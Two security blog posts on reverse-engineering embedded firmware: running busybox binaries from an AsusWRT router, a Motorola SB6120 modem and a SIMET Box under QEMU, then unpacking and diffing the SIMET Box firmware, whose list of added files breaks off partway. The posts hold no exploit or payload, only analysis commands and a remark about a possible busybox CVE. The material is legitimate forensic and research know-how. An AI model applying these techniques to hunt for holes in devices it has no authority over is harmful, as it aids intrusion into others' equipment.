For this little exercise I'll analyze three <a href="http://www.busybox.net/">busybox</a> binaries, from three different firmwares: busybox-simet (from <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box</a>), busybox-asuswrt (from <a href="https://github.com/RMerl/asuswrt-merlin">AsusWRT-Merlin firmware</a>) and busybox-sb6120 (from <a href="http://sourceforge.net/projects/sb6120.arris/">Motorolla's SB6120 Surfboard Cable Modem</a>).<br />
<br />
<b>Architecture, Big-Endian or Little Endian?</b><br />
<br />
When analyzing SIMET Box we already knew that the device was based on ar71xx platform, which is MIPS based and big endian as stated on <a href="https://dev.openwrt.org/wiki/platforms">OpenWRT's official page</a>. If you want to find it by your own you can use the file utility:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJgEE05qQWukiO-Gh7zeSqceUd3TT6uSyn4TfdL15sdIAgxxKq_sRZY74MX6wV1SnJ-0qACx8lGrWzNU8i4di39E7yJwY4444l0MhZUEOJ9cw2R-5Rfu7W8rr8m4QbvJmwRlYclcDLxso6/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJgEE05qQWukiO-Gh7zeSqceUd3TT6uSyn4TfdL15sdIAgxxKq_sRZY74MX6wV1SnJ-0qACx8lGrWzNU8i4di39E7yJwY4444l0MhZUEOJ9cw2R-5Rfu7W8rr8m4QbvJmwRlYclcDLxso6/s640/bin1.png" width="640" /></a></div>
<br />
Emdebian binutils also provide useful tools to identify further info from unknown binaries. A nice hack that I commonly use is to display information from object files using different toolchains in order to find out which one understands the file structure properly. For example, objdump -f displays contents of the overall file header.<br />
<br />
<ul>
<li>SIMET Box tl-wr740n-v4 (architecture: mips:isa32r2, file format elf32-tradbigmips)<br /></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtSXCLxijOCY12m6jRq8XcFCPJD3MHbi6bhx3ivtkIVoIepN2saz3McR8ezGh8uPpDj2GEmxFXO0TWBSFKikVlSvkXJ9jbAc8umxVo9pp5VizUzl3NCNZbqVm3SFOhW7K9HpUAV5r_hCeq/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtSXCLxijOCY12m6jRq8XcFCPJD3MHbi6bhx3ivtkIVoIepN2saz3McR8ezGh8uPpDj2GEmxFXO0TWBSFKikVlSvkXJ9jbAc8umxVo9pp5VizUzl3NCNZbqVm3SFOhW7K9HpUAV5r_hCeq/s640/bin2.png" width="640" /></a></div>
<br />
<ul>
<li>AsusWRT-Merlin v3.0.0.4.374.32 (architecture: mips:isa32 file format elf32-tradlittlemips)<br /></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTerHt8aYoG89iGIAMwpq8Sf0qP_sP6mgaQKxz16Cs2c55ygqtETPp-ekq3vdKoP66Tna4zgsF21x80y5fJFSI1mGT_ch-k3NlEn-TTQHv0dPI4u1_jaTAcUFfeiYmM5ufB_vzodKapKMw/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTerHt8aYoG89iGIAMwpq8Sf0qP_sP6mgaQKxz16Cs2c55ygqtETPp-ekq3vdKoP66Tna4zgsF21x80y5fJFSI1mGT_ch-k3NlEn-TTQHv0dPI4u1_jaTAcUFfeiYmM5ufB_vzodKapKMw/s640/bin3.png" width="640" /></a></div>
<br />
<ul>
<li>SB6120 v1.0.2.4-SCM01 (architecture: arm, file format elf32-bigarm)<br /></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS34bh2Xt96TyJTq2dKvix9ilDEQRhaPulqe-v9AGvQ6DIWdKj_ZxP6VfvVl6k65INcmup79qmibiMlNE6A_Uzbo8U2YlpKoD4Af7jvOi8o4MDjPk43GC2CroAKecBM6XBUcreUCnVOcuH/s1600/bin4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS34bh2Xt96TyJTq2dKvix9ilDEQRhaPulqe-v9AGvQ6DIWdKj_ZxP6VfvVl6k65INcmup79qmibiMlNE6A_Uzbo8U2YlpKoD4Af7jvOi8o4MDjPk43GC2CroAKecBM6XBUcreUCnVOcuH/s640/bin4.png" width="640" /></a></div>
<br />
We now know each file's format/architecture and can proceed using QEMU to emulate the binaries on a virtual environment.<br />
<br />
<b>QEMU</b><br />
<br />
QEMU is a generic and open source machine emulator and virtualizer that supports architectures like MIPS, ARM and PowerPC. In order to setup and run single binaries with QEMU on Debian based Linux distributions, you need to install the <a href="https://wiki.debian.org/QemuUserEmulation">qemu-user-static</a> package. <a href="https://twitter.com/keith55">RogueAsian</a> and <a href="https://twitter.com/devttyS0">devtty0</a> detail these steps <a href="http://milo2012.wordpress.com/2011/12/18/reversing-lifesize-220-firmware/">here</a> and <a href="http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/">here</a>.<br />
<div class="code">
sudo apt-get install qemu-user-static</div>
<br />
It's important to run qemu on a chrooted environment to avoid mixing your target's libraries with those on your host system.<br />
<br />
<b>AsusWRT-Merlin v3.0.0.4.374.32</b><br />
<br />
Let's try this on AsusWRT's busybox first. We'll have to use qemu-mipsel-static because it's MIPS32 based and Little Endian.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2o98etdVwB80e6qAXkqsLXZTHWx3Rle9gkyNFnzq_LoNHg2pHZE4ttiTQ2K926SBu6rHDOgG81gfnpY8dO0L_bti5V_gfE_Z2IwEtJKAwKh5dsBmZ9M2Aem9q9SSqKatF5qDKkPUMOzv2/s1600/qemu1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2o98etdVwB80e6qAXkqsLXZTHWx3Rle9gkyNFnzq_LoNHg2pHZE4ttiTQ2K926SBu6rHDOgG81gfnpY8dO0L_bti5V_gfE_Z2IwEtJKAwKh5dsBmZ9M2Aem9q9SSqKatF5qDKkPUMOzv2/s640/qemu1.png" width="640" /></a></div>
<br />
Hmmm, not so lucky this time, ld-uClibc.so is missing. Let's check the dynamic section and copy the necessary libraries from the original firmware:<br />
<div class="code">
mips-linux-gnu-objdump -x bin/busybox-asuswrt | grep lib</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcT2fP5f5oW_FxMqBLBuFKb7KAGUyRq9pu1OhokGKB7ghsb-aOIByNVPKXxGJfXss5lu9SJrpLrHi9l-oolqZVEVV9619oNDhEycswDotmIAM2hNOgyFnbVYTHujrY140SrdZeqKf7HnXI/s1600/qemu3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcT2fP5f5oW_FxMqBLBuFKb7KAGUyRq9pu1OhokGKB7ghsb-aOIByNVPKXxGJfXss5lu9SJrpLrHi9l-oolqZVEVV9619oNDhEycswDotmIAM2hNOgyFnbVYTHujrY140SrdZeqKf7HnXI/s640/qemu3.png" width="640" /></a></div>
<br />
We can also cross compile these libraries on our own or install the target C libraries with <a href="https://wiki.debian.org/QemuUserEmulation">dpkg-cross</a>, but using the firmware original libraries is always preferred. After copying the necessary files, we can finally execute it using QEMU:<br />
<div class="code">
cp `whereis qemu-mipsel-static | cut -d" " -f2` .<br />
sudo chroot . ./qemu-mipsel-static bin/busybox-asuswrt</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXdFC8cIjmUQgt6rTl8Xgr2jpX0NZJcx-HlDxk_ZLdZ3_8D2a-BQw-Y-vTPYUjH6W4WZ8XM2WjJTXszCFO-wAWqwdvmyx0dv4af7KUQwLCHfGdGDTxctvWbGRFrXmEpeos5Wkvcxj-weL/s1600/qemu4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXdFC8cIjmUQgt6rTl8Xgr2jpX0NZJcx-HlDxk_ZLdZ3_8D2a-BQw-Y-vTPYUjH6W4WZ8XM2WjJTXszCFO-wAWqwdvmyx0dv4af7KUQwLCHfGdGDTxctvWbGRFrXmEpeos5Wkvcxj-weL/s640/qemu4.png" width="640" /></a></div>
<br />
<b>SB6120 v1.0.2.4-SCM01</b><br />
<br />
Let's try to run busybox from Motorolla's cable modem Surfboard SV6120 (ARM/Big Endian):<br />
<br />
<div class="code">
cp `whereis qemu-armeb-static | cut -d" " -f2` .<br />
sudo chroot . ./qemu-armeb-static bin/busybox-sb6120</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXZmQnpPmZ20O6h7SWN6xSShQ0Jchvu8SxwvRJ-EFHlRwL3c-031RsRJtstO3Bwa9p49iGciqK__DkP36Bd2aFkMOqEf1___E8W90xu4640iTni8w2vJ3F0481rtvU-i3ihxZZ0nK2M6Sz/s1600/qemu5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXZmQnpPmZ20O6h7SWN6xSShQ0Jchvu8SxwvRJ-EFHlRwL3c-031RsRJtstO3Bwa9p49iGciqK__DkP36Bd2aFkMOqEf1___E8W90xu4640iTni8w2vJ3F0481rtvU-i3ihxZZ0nK2M6Sz/s640/qemu5.png" width="640" /></a></div>
<br />
BusyBox v1.4.2, might be vulnerable to CVE-2011-2716 =)<br />
<br />
<b>SIMET Box tl-wr740n-v4</b><br />
<br />
Running the busybox binary <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">extracted from SIMET Box</a> (MIPS/Big Endian):<br />
<br />
<div class="code">
cp `whereis qemu-mips-static | cut -d" " -f2` .<br />
sudo chroot . ./qemu-mips-static bin/busybox-simet<br />
mips-linux-gnu-readelf -h bin/busybox-simet</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGsle2-BagT81YpVKcpXf7rsH8Y0hKUnC7E1cv-TVWUztpB_cVet43-dWVvgkXVVPI3T5T8QgfLtj1HbT1gUxHZdDO-TZMWLQILMwEQsHPuAs3BvBZjVYFciB6cmXVLFPVVQwbKgiCUfT/s1600/qemu6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGsle2-BagT81YpVKcpXf7rsH8Y0hKUnC7E1cv-TVWUztpB_cVet43-dWVvgkXVVPI3T5T8QgfLtj1HbT1gUxHZdDO-TZMWLQILMwEQsHPuAs3BvBZjVYFciB6cmXVLFPVVQwbKgiCUfT/s640/qemu6.png" width="640" /></a></div>
<br />
Unfortunately, qemu-mips-static did not recognize the ELF image properly and was unable to run SIMET Box's binaries on the fly. For the next post I'll detail on how to overcome this issue with SIMET Box's busybox by running a full OpenWRT MIPS environment on QEMU. This is useful because we can compile and run our own (compatible) kernel, set up a network device, analyze the network activity and its system-wide interactions.<br />
<div>
<br />
<b>Conclusion</b></div>
These techniques help identifying unknown binaries from unknown architectures and running them on a virtual environment. They might be useful to analyze malware for embedded systems (<a href="http://internetcensus2012.bitbucket.org/paper.html">Internet Census 2012</a> anyone?), during forensic analysis and to hack/find vulnerabilities on firmware images.<br />
<br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com9tag:blogger.com,1999:blog-3296471108082693838.post-59415723399995631972013-08-25T11:13:00.001-03:002013-08-25T11:13:09.656-03:00SIMET Box Firmware Analysis: Embedded Device Hacking & Forensics<span style="font-family: inherit;">For my first blog post I decided to have a quick look on the firmware from SIMET Box. SIMET is organized by the Brazilian NIC.br in order to test and monitor the Internet speed across the country. For more info (in portuguese) visit their site </span><a href="http://simet.nic.br/" style="font-family: inherit;">here</a><span style="font-family: inherit;">. All the data collected is </span>available<span style="font-family: inherit;"> to the community on reports and heat maps like </span><a href="http://simet.ceptro.br/mapas/" style="font-family: inherit;">this</a><span style="font-family: inherit;">.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The organization is now handing out free Wi-Fi routers to Brazilians in order to measure the Internet quality on different regions. The SIMET Box equipment is a custom TL-WR740N pre-installed with OpenWRT. You can also download and install the standalone firmware on other TPLink's SOHO routers.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="187" src="http://s.glbimg.com/po/tt/f/original/2013/02/01/simetbox-2.png" width="320" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The project is quite interesting but in times of PRISM and NSA I don't like the idea of using a "black box" at home, so I decided to check its design.</span><br />
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">Firmware</span></b><br />
<span style="font-family: inherit;"><br />As I don't have the actual box, I'll analyze SIMET Box's firmware image. The firmware can be downloaded from <a href="http://simet.nic.br/firmware">http://simet.nic.br/firmware</a>. For this initial analysis I'll be using simetbox-tl-wr740n-v4.bin (MD5 d08798093e1591bece897671e96b5983).</span><br />
<span style="font-family: inherit;"><br />Let's start by using <a href="http://www.devttys0.com/">Craig Heffner's</a> <a href="https://code.google.com/p/binwalk/">binwalk</a> and <a href="https://code.google.com/p/firmware-mod-kit/">firmware-mod-kit</a> to unsquash the filesystem:</span><br />
<div class="code">
binwalk -Me simetbox-tl-wr740n-v4.bin</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbesmUahWe68tN2CuoFf0vRwFNyQX7dSQ-AT_NjVu-_oUlBEZQTdiLIFedRqudUbThN7075J7Ryou2lILy3e8Vf5aWhs3s5Dg8z2zI8pvy1K7lNyO8lbojQdhJe5OEPcTkDbqYcnxCcaa/s1600/binwalk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbesmUahWe68tN2CuoFf0vRwFNyQX7dSQ-AT_NjVu-_oUlBEZQTdiLIFedRqudUbThN7075J7Ryou2lILy3e8Vf5aWhs3s5Dg8z2zI8pvy1K7lNyO8lbojQdhJe5OEPcTkDbqYcnxCcaa/s640/binwalk.png" width="640" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">After extracting the files we can browse through the squashfs-root dir and grep files to identify OpenWrt's version base:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtyaImKPpZ6ahzP6uyVkS4g2V_mSWU5uG8iku5e5WB3e_tZWld6wrwn3IFnKt8BkFrs5P2kJ01_T0rdJxcVa7H64MHeCp9slFsVOmgus6Ph_v0IJp3iTxlFjlu2u_uqYfjkd2HbHcvoyyq/s1600/sm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtyaImKPpZ6ahzP6uyVkS4g2V_mSWU5uG8iku5e5WB3e_tZWld6wrwn3IFnKt8BkFrs5P2kJ01_T0rdJxcVa7H64MHeCp9slFsVOmgus6Ph_v0IJp3iTxlFjlu2u_uqYfjkd2HbHcvoyyq/s640/sm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">We now know that SIMET Box is based on Attitude Adjustment branch (v12.09) for </span>Atheros AR71xx, downloadable on OpenWRT's official site: <a href="http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin">openwrt-ar71xx-generic-tl-wr740n-v4-squashfs-factory.bin</a>.</div>
<br />
<span style="font-family: inherit;">After extracting the base firmware (using binwalk) we now have two directory trees to diff. We can use <a href="http://winmerge.org/">WinMerge</a> or <a href="http://kdiff3.sourceforge.net/">Kdiff3</a> to compare files.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI1ALNsZ95REd0O8CymeORCfuUglqJ2pXZfCzW8P8-aWhpl6PfOxHRVz0aPkoIBvSwiweUXEVO-oGvGQ9AjvYsb0k5MvVyqLuA0MLo3DpP2RohcXX1tVm_1RbX-RBEU2rJYVFeILHGCRuE/s1600/diff1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI1ALNsZ95REd0O8CymeORCfuUglqJ2pXZfCzW8P8-aWhpl6PfOxHRVz0aPkoIBvSwiweUXEVO-oGvGQ9AjvYsb0k5MvVyqLuA0MLo3DpP2RohcXX1tVm_1RbX-RBEU2rJYVFeILHGCRuE/s400/diff1.PNG" style="cursor: move;" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZMQEWuplG-HP9YhXqb_Mw5jZUUAtEQqgwxwQpgCiw6-52uZyOu69eiuJjeWeOPuKl5SWVkQgx02fkUXIW0d2NWLxHMkY4oN1D_NuFf7upUAakGNryc5Z0OGy99d3MLlpTTcRaAWLZvqAr/s1600/diff3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZMQEWuplG-HP9YhXqb_Mw5jZUUAtEQqgwxwQpgCiw6-52uZyOu69eiuJjeWeOPuKl5SWVkQgx02fkUXIW0d2NWLxHMkY4oN1D_NuFf7upUAakGNryc5Z0OGy99d3MLlpTTcRaAWLZvqAr/s320/diff3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj3SA-jO-AIELhylQsKgjEYD84VtL0PV_lBCUW06UTYtu3CVS8Q-Cn759pzkX6ZO59voFwRorC3VPbaqTSGuIERiD73CBpmC55QlHs6z6zavJ0SvhhjfYuisDqMzLOnEMH0Wrw-B_RSCDS/s1600/diff2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj3SA-jO-AIELhylQsKgjEYD84VtL0PV_lBCUW06UTYtu3CVS8Q-Cn759pzkX6ZO59voFwRorC3VPbaqTSGuIERiD73CBpmC55QlHs6z6zavJ0SvhhjfYuisDqMzLOnEMH0Wrw-B_RSCDS/s640/diff2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There are some new init.d scripts like atualiza_arqs, autossh, miniupnpd and zabbix_agentd:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJORVMrKuLzshf_Q8eqjz3YN5Q2Nzl1wIIHY4HqGjo5Wqx3LIcG44RjmwJeeubpVzEw0MJyUAivxr9QKWZp5wfi3VDsDguRAVkZa7hg865u1NpkiK6rDrCiLZz4Ots2a_AMQO8lLDfcwU/s1600/diff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="555" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJORVMrKuLzshf_Q8eqjz3YN5Q2Nzl1wIIHY4HqGjo5Wqx3LIcG44RjmwJeeubpVzEw0MJyUAivxr9QKWZp5wfi3VDsDguRAVkZa7hg865u1NpkiK6rDrCiLZz4Ots2a_AMQO8lLDfcwU/s640/diff4.png" width="640" /></a></div>
<br />
Lots of binaries (/bin/busibox for example) are quite similar: they may have a small version difference or were compiled using particular command line arguments:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95efFXSrwvWYQcNRwxz-P-khcyOymPcH93HtOi0t3zn_ei8ExOqMikNmmpsO-MqvzKxvSrq-0UnaPU0rGEDNZomm6XfkSWxkKbm4lH0m0mEDquU7kmEpS0qC_2QXdOXAZooECRneQzSq_/s1600/diff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95efFXSrwvWYQcNRwxz-P-khcyOymPcH93HtOi0t3zn_ei8ExOqMikNmmpsO-MqvzKxvSrq-0UnaPU0rGEDNZomm6XfkSWxkKbm4lH0m0mEDquU7kmEpS0qC_2QXdOXAZooECRneQzSq_/s640/diff5.png" width="640" /></a></div>
<br />
List of files created by SIMET Box (not present on the OpenWrt's base firmware):<br />
<div class="code">
while read -r i ; do file $i ; done < list.txt</div>
<div class="code">
/etc/config/autossh: ASCII text<br />
/etc/config/upnpd: ASCII text<br />
/etc/dropbear/authorized_keys: OpenSSH DSA public key<br />
/etc/dropbear/id_rsa: data<br />
/etc/hotplug.d/button/00-button: ASCII text<br />
/etc/hotplug.d/iface/20-autossh: POSIX shell script, ASCII text executable<br />
/etc/hotplug.d/iface/50-miniupnpd: POSIX shell script, ASCII text executable<br />
/etc/init.d/atualiza_arqs_simet: POSIX shell script, ASCII text executable<br />
/etc/init.d/autossh: POSIX shell script, ASCII text executable<br />
/etc/init.d/miniupnpd: POSIX shell script, ASCII text executable<br />
/etc/init.d/zabbix_agentd: POSIX shell script, ASCII text executable<br />
/etc/rc.d/S11sysctl: symbolic link to `../init.d/sysctl'<br />
/etc/rc.d/S19firewall: symbolic link to `../init.d/firewall'<br />
/etc/rc.d/S45atualiza_arqs_simet: symbolic link to `../init.d/atualiza_arqs_simet'<br />
/etc/rc.d/S60zabbix_agentd: symbolic link to `../init.d/zabbix_agentd'<br />
/etc/rc.d/S80autossh: symbolic link to `../init.d/autossh'<br />
/etc/rc.d/S95miniupnpd: symbolic link to `../init.d/miniupnpd'<br />
/etc/uci-defaults/50-reset: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/50-reset-wps: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/50-wifi: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/99-miniupnpd: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/luci-i18n-portuguese_brazilian: POSIX shell script, UTF-8 Unicode text executable<br />
/etc/uci-defaults/luci-theme-bootstrap: POSIX shell script, ASCII text executable<br />
/etc/uci-defaults/luci-upnp: POSIX shell script, ASCII text executable<br />
/etc/zabbix_agentd.conf: ASCII text<br />
/lib/libpthread-0.9.33.2.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size<br />
/lib/libpthread.so.0: symbolic link to `libpthread-0.9.33.2.so'<br />
/root/.ssh/known_hosts: ASCII text, with very long lines<br />
/sbin/fw3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/bin/auto_upgrade: symbolic link to `simet_tools'<br />
/usr/bin/checa_udhcpc.sh: POSIX shell script, ASCII text executable<br />
/usr/bin/get_mac_address.sh: POSIX shell script, ASCII text executable<br />
/usr/bin/simet_client: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/bin/simet_dns: symbolic link to `simet_tools'<br />
/usr/bin/simet_porta25: symbolic link to `simet_tools'<br />
/usr/bin/simet_tools: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/bin/sshreversetunnel: POSIX shell script, ASCII text executable<br />
/usr/bin/teste_spoofing.sh: POSIX shell script, ASCII text executable<br />
/usr/bin/wifionoff: POSIX shell script, ASCII text executable<br />
/usr/lib/lua/luci/controller/simet.lua: ASCII text<br />
/usr/lib/lua/luci/controller/upnp.lua: ASCII text<br />
/usr/lib/lua/luci/i18n/base.pt-br.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ca.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.cs.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.de.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.es.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.fr.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.hu.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.it.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ja.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.no.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.pl.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.pt-br.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.pt.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ro.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.ru.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.vi.lmo: data<br />
/usr/lib/lua/luci/i18n/upnp.zh-cn.lmo: data<br />
/usr/lib/lua/luci/model/cbi/upnp/upnp.lua: ASCII text<br />
/usr/lib/lua/luci/sgi/uhttpd.lua: ASCII text<br />
/usr/lib/lua/luci/view/admin_status/index/upnp.htm: ASCII text<br />
/usr/lib/lua/luci/view/simet/simet.htm: HTML document, UTF-8 Unicode text<br />
/usr/lib/lua/luci/view/themes/bootstrap/footer.htm: HTML document, ASCII text<br />
/usr/lib/lua/luci/view/themes/bootstrap/header.htm: HTML document, ASCII text<br />
/usr/lib/lua/luci/view/upnp_status.htm: HTML document, ASCII text<br />
/usr/lib/opkg/info/autossh.conffiles: ASCII text<br />
/usr/lib/opkg/info/autossh.control: ASCII text<br />
/usr/lib/opkg/info/autossh.list: ASCII text<br />
/usr/lib/opkg/info/hping3.control: ASCII text<br />
/usr/lib/opkg/info/hping3.list: ASCII text<br />
/usr/lib/opkg/info/libip6tc.control: ASCII text<br />
/usr/lib/opkg/info/libip6tc.list: ASCII text<br />
/usr/lib/opkg/info/libnfnetlink.control: ASCII text<br />
/usr/lib/opkg/info/libnfnetlink.list: ASCII text<br />
/usr/lib/opkg/info/libopenssl.control: ASCII text<br />
/usr/lib/opkg/info/libopenssl.list: ASCII text<br />
/usr/lib/opkg/info/libpcap.control: ASCII text<br />
/usr/lib/opkg/info/libpcap.list: ASCII text<br />
/usr/lib/opkg/info/libpthread.control: ASCII text<br />
/usr/lib/opkg/info/libpthread.list: ASCII text<br />
/usr/lib/opkg/info/luci-app-simet.control: ASCII text<br />
/usr/lib/opkg/info/luci-app-simet.list: ASCII text<br />
/usr/lib/opkg/info/luci-app-upnp.control: ASCII text<br />
/usr/lib/opkg/info/luci-app-upnp.list: ASCII text<br />
/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.control: ASCII text<br />
/usr/lib/opkg/info/luci-i18n-portuguese-brazilian.list: ASCII text<br />
/usr/lib/opkg/info/luci-sgi-uhttpd.control: ASCII text<br />
/usr/lib/opkg/info/luci-sgi-uhttpd.list: ASCII text<br />
/usr/lib/opkg/info/luci-theme-bootstrap.control: ASCII text<br />
/usr/lib/opkg/info/luci-theme-bootstrap.list: ASCII text<br />
/usr/lib/opkg/info/miniupnpd.conffiles: ASCII text<br />
/usr/lib/opkg/info/miniupnpd.control: ASCII text<br />
/usr/lib/opkg/info/miniupnpd.list: ASCII text<br />
/usr/lib/opkg/info/simet-base-files.control: ASCII text<br />
/usr/lib/opkg/info/simet-base-files.list: ASCII text<br />
/usr/lib/opkg/info/simet-client.control: ASCII text<br />
/usr/lib/opkg/info/simet-client.list: ASCII text<br />
/usr/lib/opkg/info/simet-tools.control: ASCII text<br />
/usr/lib/opkg/info/simet-tools.list: ASCII text<br />
/usr/lib/opkg/info/uhttpd-mod-lua.control: ASCII text<br />
/usr/lib/opkg/info/uhttpd-mod-lua.list: ASCII text<br />
/usr/lib/opkg/info/zabbix-agentd.control: ASCII text<br />
/usr/lib/opkg/info/zabbix-agentd.list: ASCII text<br />
/usr/lib/opkg/info/zlib.control: ASCII text<br />
/usr/lib/opkg/info/zlib.list: ASCII text<br />
/usr/lib/libcrypto.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libip6tc.so: symbolic link to `libip6tc.so.0.0.0'<br />
/usr/lib/libip6tc.so.0: symbolic link to `libip6tc.so.0.0.0'<br />
